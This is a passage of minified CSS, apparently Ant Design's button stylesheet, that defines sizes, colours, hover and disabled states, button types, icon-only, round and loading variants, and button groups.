.ant-btn-sm { height: 24px; padding: 0px 7px; font-size: 14px; border-radius: 2px; } .ant-btn > a:only-child { color: currentColor; } .ant-btn > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn:hover, .ant-btn:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: #fff; } .ant-btn:hover > a:only-child, .ant-btn:focus > a:only-child { color: currentColor; } .ant-btn:hover > a:only-child::after, .ant-btn:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: #fff; } .ant-btn:active > a:only-child { color: currentColor; } .ant-btn:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn[disabled], .ant-btn[disabled]:hover, .ant-btn[disabled]:focus, .ant-btn[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn[disabled] > a:only-child, .ant-btn[disabled]:hover > a:only-child, .ant-btn[disabled]:focus > a:only-child, .ant-btn[disabled]:active > a:only-child { color: currentColor; } .ant-btn[disabled] > a:only-child::after, .ant-btn[disabled]:hover > a:only-child::after, .ant-btn[disabled]:focus > a:only-child::after, .ant-btn[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn:hover, .ant-btn:focus, .ant-btn:active { text-decoration: none; background: #fff; } .ant-btn > span { display: inline-block; } .ant-btn-primary { color: #fff; border-color: var(--ant-primary-color); background: var(--ant-primary-color); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.12); box-shadow: 0 2px 0 rgba(0, 0, 0, 0.045); } .ant-btn-primary > a:only-child { color: currentColor; } .ant-btn-primary > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-primary:hover, .ant-btn-primary:focus { color: #fff; border-color: var(--ant-primary-color-hover); background: var(--ant-primary-color-hover); } .ant-btn-primary:hover > a:only-child, .ant-btn-primary:focus > a:only-child { color: currentColor; } .ant-btn-primary:hover > a:only-child::after, .ant-btn-primary:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-primary:active { color: #fff; border-color: var(--ant-primary-color-active); background: var(--ant-primary-color-active); } .ant-btn-primary:active > a:only-child { color: currentColor; } .ant-btn-primary:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-primary[disabled], .ant-btn-primary[disabled]:hover, .ant-btn-primary[disabled]:focus, .ant-btn-primary[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-primary[disabled] > a:only-child, .ant-btn-primary[disabled]:hover > a:only-child, .ant-btn-primary[disabled]:focus > a:only-child, .ant-btn-primary[disabled]:active > a:only-child { color: currentColor; } .ant-btn-primary[disabled] > a:only-child::after, .ant-btn-primary[disabled]:hover > a:only-child::after, .ant-btn-primary[disabled]:focus > a:only-child::after, .ant-btn-primary[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-group .ant-btn-primary:not(:first-child):not(:last-child) { border-right-color: var(--ant-primary-5); border-left-color: var(--ant-primary-5); } .ant-btn-group .ant-btn-primary:not(:first-child):not(:last-child):disabled { border-color: #d9d9d9; } .ant-btn-group .ant-btn-primary:first-child:not(:last-child) { border-right-color: var(--ant-primary-5); } .ant-btn-group .ant-btn-primary:first-child:not(:last-child)[disabled] { border-right-color: #d9d9d9; } .ant-btn-group .ant-btn-primary:last-child:not(:first-child), .ant-btn-group .ant-btn-primary + .ant-btn-primary { border-left-color: var(--ant-primary-5); } .ant-btn-group .ant-btn-primary:last-child:not(:first-child)[disabled], .ant-btn-group .ant-btn-primary + .ant-btn-primary[disabled] { border-left-color: #d9d9d9; } .ant-btn-ghost { color: rgba(0, 0, 0, 0.85); border-color: #d9d9d9; background: transparent; } .ant-btn-ghost > a:only-child { color: currentColor; } .ant-btn-ghost > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-ghost:hover, .ant-btn-ghost:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-ghost:hover > a:only-child, .ant-btn-ghost:focus > a:only-child { color: currentColor; } .ant-btn-ghost:hover > a:only-child::after, .ant-btn-ghost:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-ghost:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-ghost:active > a:only-child { color: currentColor; } .ant-btn-ghost:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-ghost[disabled], .ant-btn-ghost[disabled]:hover, .ant-btn-ghost[disabled]:focus, .ant-btn-ghost[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-ghost[disabled] > a:only-child, .ant-btn-ghost[disabled]:hover > a:only-child, .ant-btn-ghost[disabled]:focus > a:only-child, .ant-btn-ghost[disabled]:active > a:only-child { color: currentColor; } .ant-btn-ghost[disabled] > a:only-child::after, .ant-btn-ghost[disabled]:hover > a:only-child::after, .ant-btn-ghost[disabled]:focus > a:only-child::after, .ant-btn-ghost[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dashed { color: rgba(0, 0, 0, 0.85); border-color: #d9d9d9; background: #fff; border-style: dashed; } .ant-btn-dashed > a:only-child { color: currentColor; } .ant-btn-dashed > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dashed:hover, .ant-btn-dashed:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: #fff; } .ant-btn-dashed:hover > a:only-child, .ant-btn-dashed:focus > a:only-child { color: currentColor; } .ant-btn-dashed:hover > a:only-child::after, .ant-btn-dashed:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dashed:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: #fff; } .ant-btn-dashed:active > a:only-child { color: currentColor; } .ant-btn-dashed:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dashed[disabled], .ant-btn-dashed[disabled]:hover, .ant-btn-dashed[disabled]:focus, .ant-btn-dashed[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-dashed[disabled] > a:only-child, .ant-btn-dashed[disabled]:hover > a:only-child, .ant-btn-dashed[disabled]:focus > a:only-child, .ant-btn-dashed[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dashed[disabled] > a:only-child::after, .ant-btn-dashed[disabled]:hover > a:only-child::after, .ant-btn-dashed[disabled]:focus > a:only-child::after, .ant-btn-dashed[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-danger { color: #fff; border-color: var(--ant-error-color); background: var(--ant-error-color); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.12); box-shadow: 0 2px 0 rgba(0, 0, 0, 0.045); } .ant-btn-danger > a:only-child { color: currentColor; } .ant-btn-danger > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-danger:hover, .ant-btn-danger:focus { color: #fff; border-color: var(--ant-error-color-hover); background: var(--ant-error-color-hover); } .ant-btn-danger:hover > a:only-child, .ant-btn-danger:focus > a:only-child { color: currentColor; } .ant-btn-danger:hover > a:only-child::after, .ant-btn-danger:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-danger:active { color: #fff; border-color: var(--ant-error-color-active); background: var(--ant-error-color-active); } .ant-btn-danger:active > a:only-child { color: currentColor; } .ant-btn-danger:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-danger[disabled], .ant-btn-danger[disabled]:hover, .ant-btn-danger[disabled]:focus, .ant-btn-danger[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-danger[disabled] > a:only-child, .ant-btn-danger[disabled]:hover > a:only-child, .ant-btn-danger[disabled]:focus > a:only-child, .ant-btn-danger[disabled]:active > a:only-child { color: currentColor; } .ant-btn-danger[disabled] > a:only-child::after, .ant-btn-danger[disabled]:hover > a:only-child::after, .ant-btn-danger[disabled]:focus > a:only-child::after, .ant-btn-danger[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-link { color: var(--ant-primary-color); border-color: transparent; background: transparent; box-shadow: none; } .ant-btn-link > a:only-child { color: currentColor; } .ant-btn-link > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-link:hover, .ant-btn-link:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-link:hover > a:only-child, .ant-btn-link:focus > a:only-child { color: currentColor; } .ant-btn-link:hover > a:only-child::after, .ant-btn-link:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-link:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-link:active > a:only-child { color: currentColor; } .ant-btn-link:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-link[disabled], .ant-btn-link[disabled]:hover, .ant-btn-link[disabled]:focus, .ant-btn-link[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-link[disabled] > a:only-child, .ant-btn-link[disabled]:hover > a:only-child, .ant-btn-link[disabled]:focus > a:only-child, .ant-btn-link[disabled]:active > a:only-child { color: currentColor; } .ant-btn-link[disabled] > a:only-child::after, .ant-btn-link[disabled]:hover > a:only-child::after, .ant-btn-link[disabled]:focus > a:only-child::after, .ant-btn-link[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-link:hover { background: transparent; } .ant-btn-link:hover, .ant-btn-link:focus, .ant-btn-link:active { border-color: transparent; } .ant-btn-link[disabled], .ant-btn-link[disabled]:hover, .ant-btn-link[disabled]:focus, .ant-btn-link[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: transparent; background: transparent; text-shadow: none; box-shadow: none; } .ant-btn-link[disabled] > a:only-child, .ant-btn-link[disabled]:hover > a:only-child, .ant-btn-link[disabled]:focus > a:only-child, .ant-btn-link[disabled]:active > a:only-child { color: currentColor; } .ant-btn-link[disabled] > a:only-child::after, .ant-btn-link[disabled]:hover > a:only-child::after, .ant-btn-link[disabled]:focus > a:only-child::after, .ant-btn-link[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-text { color: rgba(0, 0, 0, 0.85); border-color: transparent; background: transparent; box-shadow: none; } .ant-btn-text > a:only-child { color: currentColor; } .ant-btn-text > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-text:hover, .ant-btn-text:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-text:hover > a:only-child, .ant-btn-text:focus > a:only-child { color: currentColor; } .ant-btn-text:hover > a:only-child::after, .ant-btn-text:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-text:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-text:active > a:only-child { color: currentColor; } .ant-btn-text:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-text[disabled], .ant-btn-text[disabled]:hover, .ant-btn-text[disabled]:focus, .ant-btn-text[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-text[disabled] > a:only-child, .ant-btn-text[disabled]:hover > a:only-child, .ant-btn-text[disabled]:focus > a:only-child, .ant-btn-text[disabled]:active > a:only-child { color: currentColor; } .ant-btn-text[disabled] > a:only-child::after, .ant-btn-text[disabled]:hover > a:only-child::after, .ant-btn-text[disabled]:focus > a:only-child::after, .ant-btn-text[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-text:hover, .ant-btn-text:focus { color: rgba(0, 0, 0, 0.85); background: rgba(0, 0, 0, 0.018); border-color: transparent; } .ant-btn-text:active { color: rgba(0, 0, 0, 0.85); background: rgba(0, 0, 0, 0.028); border-color: transparent; } .ant-btn-text[disabled], .ant-btn-text[disabled]:hover, .ant-btn-text[disabled]:focus, .ant-btn-text[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: transparent; background: transparent; text-shadow: none; box-shadow: none; } .ant-btn-text[disabled] > a:only-child, .ant-btn-text[disabled]:hover > a:only-child, .ant-btn-text[disabled]:focus > a:only-child, .ant-btn-text[disabled]:active > a:only-child { color: currentColor; } .ant-btn-text[disabled] > a:only-child::after, .ant-btn-text[disabled]:hover > a:only-child::after, .ant-btn-text[disabled]:focus > a:only-child::after, .ant-btn-text[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous { color: var(--ant-error-color); border-color: var(--ant-error-color); background: #fff; } .ant-btn-dangerous > a:only-child { color: currentColor; } .ant-btn-dangerous > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous:hover, .ant-btn-dangerous:focus { color: var(--ant-error-color-hover); border-color: var(--ant-error-color-hover); background: #fff; } .ant-btn-dangerous:hover > a:only-child, .ant-btn-dangerous:focus > a:only-child { color: currentColor; } .ant-btn-dangerous:hover > a:only-child::after, .ant-btn-dangerous:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous:active { color: var(--ant-error-color-active); border-color: var(--ant-error-color-active); background: #fff; } .ant-btn-dangerous:active > a:only-child { color: currentColor; } .ant-btn-dangerous:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous[disabled], .ant-btn-dangerous[disabled]:hover, .ant-btn-dangerous[disabled]:focus, .ant-btn-dangerous[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-dangerous[disabled] > a:only-child, .ant-btn-dangerous[disabled]:hover > a:only-child, .ant-btn-dangerous[disabled]:focus > a:only-child, .ant-btn-dangerous[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous[disabled] > a:only-child::after, .ant-btn-dangerous[disabled]:hover > a:only-child::after, .ant-btn-dangerous[disabled]:focus > a:only-child::after, .ant-btn-dangerous[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-primary { color: #fff; border-color: var(--ant-error-color); background: var(--ant-error-color); text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.12); box-shadow: 0 2px 0 rgba(0, 0, 0, 0.045); } .ant-btn-dangerous.ant-btn-primary > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-primary > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-primary:hover, .ant-btn-dangerous.ant-btn-primary:focus { color: #fff; border-color: var(--ant-error-color-hover); background: var(--ant-error-color-hover); } .ant-btn-dangerous.ant-btn-primary:hover > a:only-child, .ant-btn-dangerous.ant-btn-primary:focus > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-primary:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-primary:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-primary:active { color: #fff; border-color: var(--ant-error-color-active); background: var(--ant-error-color-active); } .ant-btn-dangerous.ant-btn-primary:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-primary:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-primary[disabled], .ant-btn-dangerous.ant-btn-primary[disabled]:hover, .ant-btn-dangerous.ant-btn-primary[disabled]:focus, .ant-btn-dangerous.ant-btn-primary[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-dangerous.ant-btn-primary[disabled] > a:only-child, .ant-btn-dangerous.ant-btn-primary[disabled]:hover > a:only-child, .ant-btn-dangerous.ant-btn-primary[disabled]:focus > a:only-child, .ant-btn-dangerous.ant-btn-primary[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-primary[disabled] > a:only-child::after, .ant-btn-dangerous.ant-btn-primary[disabled]:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-primary[disabled]:focus > a:only-child::after, .ant-btn-dangerous.ant-btn-primary[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link { color: var(--ant-error-color); border-color: transparent; background: transparent; box-shadow: none; } .ant-btn-dangerous.ant-btn-link > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link:hover, .ant-btn-dangerous.ant-btn-link:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-dangerous.ant-btn-link:hover > a:only-child, .ant-btn-dangerous.ant-btn-link:focus > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-link:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-dangerous.ant-btn-link:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link[disabled], .ant-btn-dangerous.ant-btn-link[disabled]:hover, .ant-btn-dangerous.ant-btn-link[disabled]:focus, .ant-btn-dangerous.ant-btn-link[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-dangerous.ant-btn-link[disabled] > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link[disabled] > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link:hover, .ant-btn-dangerous.ant-btn-link:focus { color: var(--ant-error-color-hover); border-color: transparent; background: transparent; } .ant-btn-dangerous.ant-btn-link:hover > a:only-child, .ant-btn-dangerous.ant-btn-link:focus > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-link:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link:active { color: var(--ant-error-color-active); border-color: transparent; background: transparent; } .ant-btn-dangerous.ant-btn-link:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-link[disabled], .ant-btn-dangerous.ant-btn-link[disabled]:hover, .ant-btn-dangerous.ant-btn-link[disabled]:focus, .ant-btn-dangerous.ant-btn-link[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: transparent; background: transparent; text-shadow: none; box-shadow: none; } .ant-btn-dangerous.ant-btn-link[disabled] > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child, .ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-link[disabled] > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child::after, .ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text { color: var(--ant-error-color); border-color: transparent; background: transparent; box-shadow: none; } .ant-btn-dangerous.ant-btn-text > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text:hover, .ant-btn-dangerous.ant-btn-text:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-dangerous.ant-btn-text:hover > a:only-child, .ant-btn-dangerous.ant-btn-text:focus > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-text:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-dangerous.ant-btn-text:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text[disabled], .ant-btn-dangerous.ant-btn-text[disabled]:hover, .ant-btn-dangerous.ant-btn-text[disabled]:focus, .ant-btn-dangerous.ant-btn-text[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-dangerous.ant-btn-text[disabled] > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:hover > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:focus > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text[disabled] > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:focus > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text:hover, .ant-btn-dangerous.ant-btn-text:focus { color: var(--ant-error-color-hover); border-color: transparent; background: rgba(0, 0, 0, 0.018); } .ant-btn-dangerous.ant-btn-text:hover > a:only-child, .ant-btn-dangerous.ant-btn-text:focus > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-text:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text:active { color: var(--ant-error-color-active); border-color: transparent; background: rgba(0, 0, 0, 0.028); } .ant-btn-dangerous.ant-btn-text:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-dangerous.ant-btn-text[disabled], .ant-btn-dangerous.ant-btn-text[disabled]:hover, .ant-btn-dangerous.ant-btn-text[disabled]:focus, .ant-btn-dangerous.ant-btn-text[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: transparent; background: transparent; text-shadow: none; box-shadow: none; } .ant-btn-dangerous.ant-btn-text[disabled] > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:hover > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:focus > a:only-child, .ant-btn-dangerous.ant-btn-text[disabled]:active > a:only-child { color: currentColor; } .ant-btn-dangerous.ant-btn-text[disabled] > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:hover > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:focus > a:only-child::after, .ant-btn-dangerous.ant-btn-text[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-icon-only { width: 32px; height: 32px; padding: 2.4px 0; font-size: 16px; border-radius: 2px; vertical-align: -3px; } .ant-btn-icon-only > * { font-size: 16px; } .ant-btn-icon-only.ant-btn-lg { width: 40px; height: 40px; padding: 4.9px 0; font-size: 18px; border-radius: 2px; } .ant-btn-icon-only.ant-btn-lg > * { font-size: 18px; } .ant-btn-icon-only.ant-btn-sm { width: 24px; height: 24px; padding: 0px 0; font-size: 14px; border-radius: 2px; } .ant-btn-icon-only.ant-btn-sm > * { font-size: 14px; } .ant-btn-icon-only > .anticon { display: flex; justify-content: center; } a.ant-btn-icon-only { vertical-align: -1px; } a.ant-btn-icon-only > .anticon { display: inline; } .ant-btn-round { height: 32px; padding: 4px 16px; font-size: 14px; border-radius: 32px; } .ant-btn-round.ant-btn-lg { height: 40px; padding: 6.4px 20px; font-size: 16px; border-radius: 40px; } .ant-btn-round.ant-btn-sm { height: 24px; padding: 0px 12px; font-size: 14px; border-radius: 24px; } .ant-btn-round.ant-btn-icon-only { width: auto; } .ant-btn-circle { min-width: 32px; padding-right: 0; padding-left: 0; text-align: center; border-radius: 50%; } .ant-btn-circle.ant-btn-lg { min-width: 40px; border-radius: 50%; } .ant-btn-circle.ant-btn-sm { min-width: 24px; border-radius: 50%; } .ant-btn::before { position: absolute; top: -1px; right: -1px; bottom: -1px; left: -1px; z-index: 1; display: none; background: #fff; border-radius: inherit; opacity: 0.35; transition: opacity 0.2s; content: ''; pointer-events: none; } .ant-btn .anticon { transition: margin-left 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-btn .anticon.anticon-plus > svg, .ant-btn .anticon.anticon-minus > svg { shape-rendering: optimizeSpeed; } .ant-btn.ant-btn-loading { position: relative; cursor: default; } .ant-btn.ant-btn-loading::before { display: block; } .ant-btn > .ant-btn-loading-icon { transition: width 0.3s cubic-bezier(0.645, 0.045, 0.355, 1), opacity 0.3s cubic-bezier(0.645, 0.045, 0.355, 1); } .ant-btn > .ant-btn-loading-icon .anticon { padding-right: 8px; -webkit-animation: none; animation: none; } .ant-btn > .ant-btn-loading-icon .anticon svg { -webkit-animation: loadingCircle 1s infinite linear; animation: loadingCircle 1s infinite linear; } .ant-btn > .ant-btn-loading-icon:only-child .anticon { padding-right: 0; } .ant-btn-group { position: relative; display: inline-flex; } .ant-btn-group > .ant-btn, .ant-btn-group > span > .ant-btn { position: relative; } .ant-btn-group > .ant-btn:hover, .ant-btn-group > span > .ant-btn:hover, .ant-btn-group > .ant-btn:focus, .ant-btn-group > span > .ant-btn:focus, .ant-btn-group > .ant-btn:active, .ant-btn-group > span > .ant-btn:active { z-index: 2; } .ant-btn-group > .ant-btn[disabled], .ant-btn-group > span > .ant-btn[disabled] { z-index: 0; } .ant-btn-group .ant-btn-icon-only { font-size: 14px; } .ant-btn-group-lg > .ant-btn, .ant-btn-group-lg > span > .ant-btn { height: 40px; padding: 6.4px 15px; font-size: 16px; border-radius: 0; } .ant-btn-group-lg .ant-btn.ant-btn-icon-only { width: 40px; height: 40px; padding-right: 0; padding-left: 0; } .ant-btn-group-sm > .ant-btn, .ant-btn-group-sm > span > .ant-btn { height: 24px; padding: 0px 7px; font-size: 14px; border-radius: 0; } .ant-btn-group-sm > .ant-btn > .anticon, .ant-btn-group-sm > span > .ant-btn > .anticon { font-size: 14px; } .ant-btn-group-sm .ant-btn.ant-btn-icon-only { width: 24px; height: 24px; padding-right: 0; padding-left: 0; } .ant-btn-group .ant-btn + .ant-btn, .ant-btn + .ant-btn-group, .ant-btn-group span + .ant-btn, .ant-btn-group .ant-btn + span, .ant-btn-group > span + span, .ant-btn-group + .ant-btn, .ant-btn-group + .ant-btn-group { margin-left: -1px; } .ant-btn-group .ant-btn-primary + .ant-btn:not(.ant-btn-primary):not([disabled]) { 